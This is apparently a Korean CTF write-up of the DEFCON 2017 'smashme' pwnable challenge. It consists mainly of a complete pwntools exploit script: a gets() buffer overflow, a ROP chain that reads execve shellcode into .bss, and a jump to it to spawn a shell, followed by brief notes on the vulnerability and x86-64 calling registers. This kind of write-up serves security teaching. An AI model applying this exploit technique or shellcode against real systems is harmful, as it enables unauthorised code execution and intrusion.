-
DEFCON 2017 smashmePwnable/CTF 2017. 5. 2. 23:16123456789101112131415161718192021222324252627282930p=remote("192.168.146.133",9001)elf=ELF("./smashme")read_plt=elf.symbols["read"]bss=elf.bss()+0x20shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"shell_rsi=0x004015f7shell_rdi=0x004014d6shell_rdx=0x00441e46filt="Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"payload=filtpayload+=p64(shell_rsi)payload+=p64(bss)payload+=p64(shell_rdi)payload+=p64(0)payload+=p64(shell_rdx)payload+=p64(len(shellcode))payload+=p64(read_plt)payload+=p64(bss)p.sendline(payload)p.sendline(shellcode)p.interactive()
cs 아이다로 보면 GETS함수로 버퍼오버플로우 취약점이 있음
분기문 하나가 보일텐데 저 문자열(filt 변수 문자열)이 아니라면 QUIT 시키고 맞다면 정상적으로 leave; ret이 됨
쉘코드가 64bit syscall하는 쉘코드 (출처 : http://shell-storm.org/shellcode/files/shellcode-806.php)
rdi 1
rsi 2
rdx 3
rcx 4
64bit 인자 레지스터
'Pwnable > CTF' 카테고리의 다른 글
Secuinside 2017 ohce (0) 2017.07.03 Codegate 2016 floppy (0) 2017.06.10 BKPCTF cookbook (0) 2017.03.31 PlaidCTF 2014 kappa (0) 2017.03.14 PlaidCTF 2014 EZHP (2) 2017.03.10